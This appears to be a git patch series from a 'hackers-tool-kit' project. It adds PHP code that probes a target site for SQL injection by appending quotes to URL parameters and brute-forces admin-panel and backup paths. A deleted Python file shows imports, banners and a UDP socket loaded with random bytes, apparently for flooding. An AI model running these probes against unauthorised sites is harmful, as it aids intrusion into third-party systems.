. "S Q L V U L N E R A B I L I T Y S C A N N E R\n"; + echo "===================================================$cln"; + echo "\n"; + $lulzurl = $ipsl . $ip; + $html = file_get_contents($lulzurl); + $dom = new DOMDocument; + @$dom->loadHTML($html); + $links = $dom->getElementsByTagName('a'); + $vlnk = 0; + foreach ($links as $link) + { + $lol = $link->getAttribute('href'); + if (strpos($lol, '?') !== false) + { + echo "\n$blue [#] " . $fgreen . $lol . "\n$cln"; + echo $blue . " [-] Searching For SQL Errors: "; + $sqllist = file_get_contents('sqlerrors.ini'); + $sqlist = explode(',', $sqllist); + if (strpos($lol, '://') !== false) + { + $sqlurl = $lol . "'"; + } + else + { + $sqlurl = $ipsl . $ip . "/" . $lol . "'"; + } + $sqlsc = file_get_contents($sqlurl); + $sqlvn = "$red Not Found"; + foreach ($sqlist as $sqli) + { + if (strpos($sqlsc, $sqli) !== false) + $sqlvn = "$green Found!"; + } + echo $sqlvn; + echo "\n$cln"; + echo "\n"; + $vlnk++; + } + } + echo "\n\n$blue [+] URL(s) With Parameter(s):" . $green . $vlnk; + echo "\n\n"; + + echo "\n\n$bold" . $lblue . "C R A W L E R \n"; + echo "============="; + echo "\n\n"; + echo "\nCrawling Types & Descriptions:$cln"; + echo "\n\n$bold" . "69:$cln This is the lite version of tge crawler, This will show you the files which returns the http code '200'. This is time efficient and less messy.\n"; + echo "\n$bold" . "420:$cln This is a little advance one it will show you all the list of files with their http code other then the badboy 404. This is a little messier but informative \n\n"; +csel: + echo "Select Crawler Type (69/420): "; + $ctype = trim(fgets(STDIN, 1024)); + if ($ctype == "420") + { + echo "\n\t -[ A D V A N C E C R A W L I N G ]-\n"; + echo "\n\n"; + echo "\n Loading Crawler File ....\n"; + if (file_exists("crawl/admin.ini")) + { + echo "\n[-] Admin Crawler File Found! Scanning For Admin Pannel [-]\n"; + $crawllnk = file_get_contents("crawl/admin.ini"); + $crawls = explode(',', $crawllnk); + echo "\nURLs Loaded: " . count($crawls) . "\n\n"; + foreach ($crawls as $crawl) + { + $url = $ipsl . $ip . "/" . $crawl; + $handle = curl_init($url); + curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE); + $response = curl_exec($handle); + $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE); + if ($httpCode == 200) + { + echo "\n\n[U] $url : "; + echo "Found!"; + } + elseif ($httpCode == 404) + { + } + else + { + echo "\n\n[U] $url : "; + echo "HTTP Response: " . $httpCode; + } + curl_close($handle); + } + } + else + { + echo "\n File Not Found, Aborting Crawl ....\n"; + } + if (file_exists("crawl/backup.ini")) + { + echo "\n[-] Backup Crawler File Found! Scanning For Site Backups [-]\n"; + $crawllnk = file_get_contents("crawl/backup.ini"); + $crawls = explode(',', $crawllnk); + echo "\nURLs Loaded: " . count($crawls) . "\n\n"; + foreach ($crawls as $crawl) + { + $url = $ipsl . $ip . "/" . $crawl; + $handle = curl_init($url); + curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE); + $response = curl_exec($handle); + $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE); + if ($httpCode == 200) + { + echo "\n\n[U] $url : "; + echo "Found!"; + } + elseif ($httpCode == 404) + { + } + else + { + echo "\n\n[U] $url : "; + echo "HTTP Response: " . $httpCode; + } + curl_close($handle); + } + } + else + { + echo "\n File Not Found, Aborting Crawl ....\n"; + } + if (file_exists("crawl/others.ini")) + { + echo "\n[-] General Crawler File Found! Crawling The Site [-]\n"; + $crawllnk = file_get_contents("crawl/others.ini"); + $crawls = explode(',', $crawllnk); + echo "\nURLs Loaded: " . count($crawls) . "\n\n"; + foreach ($crawls as $crawl) + { + $url = $ipsl . $ip . "/" . $crawl; + $handle = curl_init($url); + curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE); + $response = curl_exec($handle); + $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE); + if ($httpCode == 200) + { + echo "\n\n[U] $url : "; + echo "Found!"; + } + elseif ($httpCode == 404) + { + } + else + { + echo "\n\n[U] $url : "; + echo "HTTP Response: " . $httpCode; + } + curl_close($handle); + } + } + else + { + echo "\n File Not Found, Aborting Crawl ....\n"; + } + } + elseif ($ctype == "69") + { + echo "\n\t -[ B A S I C C R A W L I N G ]-\n"; + echo "\n\n"; + echo "\n Loading Crawler File ....\n"; + if (file_exists("crawl/admin.ini")) + { + echo "\n[-] Admin Crawler File Found! Scanning For Admin Pannel [-]\n"; + $crawllnk = file_get_contents("crawl/admin.ini"); + $crawls = explode(',', $crawllnk); + echo "\nURLs Loaded: " . count($crawls) . "\n\n"; + foreach ($crawls as $crawl) + { + $url = $ipsl . $ip . "/" . $crawl; + $handle = curl_init($url); + curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE); + $response = curl_exec($handle); + $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE); + if ($httpCode == 200) + { + echo "\n\n[U] $url : "; + echo "Found!"; + } + elseif ($httpCode == 404) + { + } + else + { + echo "."; + } + curl_close($handle); + } + } + else + { + echo "\n File Not Found, Aborting Crawl ....\n"; + } + if (file_exists("crawl/backup.ini")) + { + echo "\n[-] Backup Crawler File Found! Scanning For Site Backups [-]\n"; + $crawllnk = file_get_contents("crawl/backup.ini"); + $crawls = explode(',', $crawllnk); + echo "\nURLs Loaded: " . count($crawls) . "\n\n"; + foreach ($crawls as $crawl) + { + $url = $ipsl . $ip . "/" . $crawl; + $handle = curl_init($url); + curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE); + $response = curl_exec($handle); + $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE); + if ($httpCode == 200) + { + echo "\n\n[U] $url : "; + echo "Found!"; + } + elseif ($httpCode == 404) + { + } + curl_close($handle); + } + } + else + { + echo "\n File Not Found, Aborting Crawl ....\n"; + } + if (file_exists("crawl/others.ini")) + { + echo "\n[-] General Crawler File Found! Crawling The Site [-]\n"; + $crawllnk = file_get_contents("crawl/others.ini"); + $crawls = explode(',', $crawllnk); + echo "\nURLs Loaded: " . count($crawls) . "\n\n"; + foreach ($crawls as $crawl) + { + $url = $ipsl . $ip . "/" . $crawl; + $handle = curl_init($url); + curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE); + $response = curl_exec($handle); + $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE); + if ($httpCode == 200) + { + echo "\n\n[U] $url : "; + echo "Found!"; + } + elseif ($httpCode == 404) + { + } + curl_close($handle); + } + } + else + { + echo "\n File Not Found, Aborting Crawl ....\n"; + } + } + else + { + goto csel; + } + } + } + } +?> diff --git a/redhawk/sqlerrors.ini b/redhawk/sqlerrors.ini new file mode 100644 index 0000000..9249373 --- /dev/null +++ b/redhawk/sqlerrors.ini @@ -0,0 +1 @@ +You have an error in your SQL syntax,supplied argument is not a valid MySQL result resource,check the manual that corresponds to your MySQL,mysql_fetch_array(),supplied argument is not a valid MySQL,function fetch_row(),Microsoft OLE DB Provider for ODBC Drivers error diff --git a/redhawk/var.php b/redhawk/var.php new file mode 100644 index 0000000..fe210c4 --- /dev/null +++ b/redhawk/var.php @@ -0,0 +1,44 @@ + diff --git a/redhawk/version.txt b/redhawk/version.txt new file mode 100644 index 0000000..227cea2 --- /dev/null +++ b/redhawk/version.txt @@ -0,0 +1 @@ +2.0.0 From 44678b3cd60cb55400d3a941d82cc4cf3dee16c4 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 29 May 2019 01:06:30 +0100 Subject: [PATCH 157/214] Delete htk.py --- htk.py | 3079 -------------------------------------------------------- 1 file changed, 3079 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 693eb2a..0000000 --- a/htk.py +++ /dev/null @@ -1,3079 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @tuf_unkn0wn -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """ - type ? for help -\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - type ? for help - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - - type ? for help - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - type ? for help - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """ - type ? for help\033[91m - -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" -def mainbanner9(): - print """ -\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ -║ ║ -\033[33m║ ║ -║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ -\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ -║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ -\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ -║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ -\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ -║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ -\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ -║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ -\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ -║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ -\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ -║\033[0m █ ▐ ▀ █ ▐ \033[95m║ -\033[35m║\033[0m ▐ ▐ \033[35m║ -║ ║\033[1;31m -╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m - type ? for help - """.decode('utf-8') - -def mainbanner10(): - print """\033[0m - ░░░▓█▒░▒▒▒▓▓░ - ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ - ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ - ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ - ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ - ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ - ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ - ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ - ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ - ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ - ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ - ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ - ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ - ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ - ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ - ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ - ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ - ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ - ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ - ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ - ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ - ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ - ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ - ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ - ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ - ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ - ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ - ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ - ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ - ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ - ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ - ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ - ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ - ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ - ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ - ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ - ░█▓▓▓▓▓▓███████▓██▓██░ - ░██▓▓▓████████████████░░░ - ░▓▓▓▓▓███████▓█▓████████░ ░░░ - ░░░█▓█████████████████████████▓▓▓▒░░░░░░ - ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ - ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ - ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ - ░░▓█▓█▓█████████████████████████████░░ - \033[0m""".decode('utf-8') -def mainbanner11(): - print """\033[91m - ██████╗ ██████╗ ██████╗ - ██╔════╝ ██╔════╝ ██╔════╝ - ███████╗ ███████╗ ███████╗ - ██╔═══██╗██╔═══██╗██╔═══██╗ - ╚██████╔╝╚██████╔╝╚██████╔╝ - ╚═════╝ ╚═════╝ ╚═════╝ - ░░░░ ░░░░░ - ░▒███████▓▒░░ ░░░████████▓░░░ - ░▓████████████▒░░ ░░█████████████░░ - ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ - ░ ░██████▒░ ░░░░███████ ░░ - ░░███████░░ ░░██████▓░ - ░███████░░ ░▒██████▒ - ░░░░ ░░███████░░░███████▒░ ░░░ - ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ - ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ - ░▒██████████████▒████████▒██████████████░░ - ░░██████████████▒░███▒▒▒█████████████░░ - ░░░░▓████████░█░▓▓▒████████▒░░░░░ - ░░████████▓░██░████████▒░░░ - ░░▒██████░▒▒░░▒░░██████░ - ░░█████████▓░█░████▓███▓░ - ░▒█▓░▒██████▒███████░░█▓░ - ░░░███████████████████▓░░ - ░▒▓████████████████▒░ - ░░▒███████████████▓▒░ - ░▒█████▓██████░░ - ░██████████░ - @tuf_unkn0wn ░█████████▒ type ? for help - █████████░░ - ░░████████░░ - ░▓█████▓░ 